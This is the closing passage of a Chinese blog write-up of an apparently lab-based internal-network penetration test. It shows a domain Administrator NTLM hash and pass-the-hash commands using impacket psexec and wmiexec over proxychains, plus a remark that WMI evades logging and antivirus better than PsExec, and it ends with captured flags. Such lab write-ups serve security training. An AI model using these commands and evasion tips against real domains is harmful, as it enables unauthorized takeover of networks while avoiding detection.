<pre class="line-numbers language-none"><code class="language-none">nasa.gov\Administrator:500:aad3b435b51404eeaad3b435b51404ee:fbe5588a79e40d41d77a40569c7b3090:::<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>拿到哈希，后面就是常规PTH了。</p>
<p>用psexec</p>
<pre class="line-numbers language-none"><code class="language-none">proxychains4 python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:fbe5588a79e40d41d77a40569c7b3090 nasa.gov&#x2F;administrator@10.10.10.140<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>或者使用wmi</p>
<blockquote>
<p>由于Windows默认不会将WMI的操作记录在日志里，同时现在越来越多的杀软将PsExec加入了黑名单，因此WMI比PsExec隐蔽性要更好一些</p>
</blockquote>
<pre class="line-numbers language-none"><code class="language-none">proxychains4 python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:fbe5588a79e40d41d77a40569c7b3090 nasa.gov&#x2F;administrator@10.10.10.140 -codec gbk<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004193238267.png"></p>
<p>第四个flag</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004195112615.png"></p>
<p>同样连接ad02,拿第五个flag</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004195215296.png"></p>
<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>到这就告一段落了，中间摸了几个月，最近补完流程，写到后面已经有点疲倦了，只想快点结束。</p>
<p>主要给出一个大致流程，很多技术还没涉及到，比如权限维持、委派攻击之类的，还有一些细节性的东西也没写，后续打其他靶场再补充吧。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="./about" rel="external nofollow noreferrer">巡璃</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a target="_blank" rel="noopener" href="https://syunaht.com./p/3625148018.html">https://syunaht.com./p/3625148018.html</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="./about" target="_blank">巡璃</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="./tags/Web/">
                                    <span class="chip bg-color">Web</span>
                                </a>
                            
                                <a href="./tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                                    <span class="chip bg-color">内网渗透</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="./libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="./libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("./medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="./libs/valine/av-min.js"></script>
<script src="./libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'DePPrTHvVtRAAg5I6xqTfarg-gzGzoHsz',
        appKey: 'XjFNE6eco4UQkr4uh5WYk27C',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: '欢迎评论交流~'
    });
</script>

<!--酷Q推送-->


    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="./p/1853756331.html">
                    <div class="card-image">
                        
                        
                        <img src="./medias/featureimages/37.jpg" class="responsive-img" alt="CISCN2022初赛-Web">
                        
                        <span class="card-title">CISCN2022初赛-Web</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-05-29
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="./categories/Web/" class="post-category">
                                    Web
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="./tags/CTF/">
                        <span class="chip bg-color">CTF</span>
                    </a>
                    
                    <a href="./tags/%E6%AF%94%E8%B5%9B/">
                        <span class="chip bg-color">比赛</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="./p/2667916416.html">
                    <div class="card-image">
                        
                        
                        <img src="./medias/featureimages/79.jpg" class="responsive-img" alt="挖洞实战之信息泄露与前端加密">
                        
                        <span class="card-title">挖洞实战之信息泄露与前端加密</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-03-15
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="./categories/SRC/" class="post-category">
                                    SRC
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="./tags/JS%E9%80%86%E5%90%91/">
                        <span class="chip bg-color">JS逆向</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="./libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="./libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="./libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="./libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="./libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container center-align"
         style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right" style="text-align: center;">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2023</span>
            
            <a href="./about" target="_blank">巡璃</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
                <span id="sitetime"> Loading ...</span>
                <script>
                    var calcSiteTime = function () {
                        var seconds = 1000;
                        var minutes = seconds * 60;
                        var hours = minutes * 60;
                        var days = hours * 24;
                        var years = days * 365;
                        var today = new Date();
                        var startYear = "2019";
                        var startMonth = "12";
                        var startDate = "1";
                        var startHour = "0";
                        var startMinute = "0";
                        var startSecond = "0";
                        var todayYear = today.getFullYear();
                        var todayMonth = today.getMonth() + 1;
                        var todayDate = today.getDate();
                        var todayHour = today.getHours();
                        var todayMinute = today.getMinutes();
                        var todaySecond = today.getSeconds();
                        var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                        var diff = t2 - t1;
                        var diffYears = Math.floor(diff / years);
                        var diffDays = Math.floor((diff / days) - diffYears * 365);

                        // 区分是否有年份.
                        var language = 'zh-CN';
                        if (startYear === String(todayYear)) {
                            document.getElementById("year").innerHTML = todayYear;
                            var daysTip = 'This site has been running for ' + diffDays + ' days';
                            if (language === 'zh-CN') {
                                daysTip = '本站已运行 ' + diffDays + ' 天';
                            } else if (language === 'zh-HK') {
                                daysTip = '本站已運行 ' + diffDays + ' 天';
                            }
                            document.getElementById("sitetime").innerHTML = daysTip;
                        } else {
                            document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                            var yearsAndDaysTip = 'This site has been running for ' + diffYears + ' years and '
                                + diffDays + ' days';
                            if (language === 'zh-CN') {
                                yearsAndDaysTip = '本站已运行 ' + diffYears + ' 年 ' + diffDays + ' 天';
                            } else if (language === 'zh-HK') {
                                yearsAndDaysTip = '本站已運行 ' + diffYears + ' 年 ' + diffDays + ' 天';
                            }
                            document.getElementById("sitetime").innerHTML = yearsAndDaysTip;
                        }
                    }

                    calcSiteTime();
                </script>
            
            <br>
            
        </div>
        <!-- <div class="col s12 m4 l4 social-link social-statis">














    <a href="./atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div> -->
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>

    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    var cnt = 1;
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + String(cnt) + ". " + data_title + "</a>";
                            cnt += 1;
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                if (start < 0) {
                                    start = 0;
                                }
                                var match_content = content.substr(start, 100);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    str = "<p class=\"search-result-summary\">共找到" + String(cnt-1) + "条结果</p>"  + str;
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('./search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="./libs/materialize/materialize.min.js"></script>
    <script src="./libs/masonry/masonry.pkgd.min.js"></script>
    <script src="./libs/aos/aos.js"></script>
    <script src="./libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="./libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="./js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

    

    <!-- Baidu Analytics -->

<script>
    var _hmt = _hmt || [];
    (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?419a24beb94d4fd7fed0042a3b4aaecc";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="./libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="./libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="./libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
